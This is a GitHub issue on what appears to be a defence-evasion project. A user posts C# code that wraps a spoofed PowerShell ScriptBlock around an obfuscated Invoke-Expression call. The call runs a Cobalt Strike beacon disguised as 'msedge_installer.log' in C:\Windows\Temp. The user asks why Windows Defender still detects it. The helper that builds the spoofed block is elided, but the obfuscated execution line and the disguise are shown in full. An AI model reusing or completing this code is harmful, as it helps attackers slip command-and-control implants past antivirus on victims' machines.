Still being detected by wdfdr... #2

Open
@NickYan7

Description

A very nice anti-detection idea; however, my sample can still be detected by Windows Defender. Here is the demo code:

...
namespace ScriptSmuggling
{
    public class Program
    {
        public static void Main()
        {
            // the msedge_installer.log is an obfuscated Cobalt Strike beacon file (.ps1); it can be executed by iex
            string script = @". ($pShOmE[4]+$PsHoMe[34]+'X') (cat C:\Windows\Temp\msedge_installer.log)";
            ScriptBlock sb = BuildSpoofedBlock(script);
            // Setup PowerShell runspace
            using (Runspace runSpace = RunspaceFactory.CreateRunspace())
            {
                runSpace.Open();
                using (PowerShell ps = PowerShell.Create())
                {
                    ps.Runspace = runSpace;

                    ps.AddCommand("Invoke-Command")
                      .AddParameter("ScriptBlock", sb);

                    Collection<PSObject> results = ps.Invoke();
                    foreach (PSObject result in results)
                    {
                        Console.WriteLine(result);
                    }

                    // Display any errors from the error stream
                    foreach (ErrorRecord error in ps.Streams.Error)
                    {
                        Console.WriteLine("ERROR: " + error);
                    }
                }
            }
        }

        public static ScriptBlock BuildSpoofedBlock(string content)
        {
            ...
        }
    }
}

Maybe the executableAst is still being checked by wdfdr?
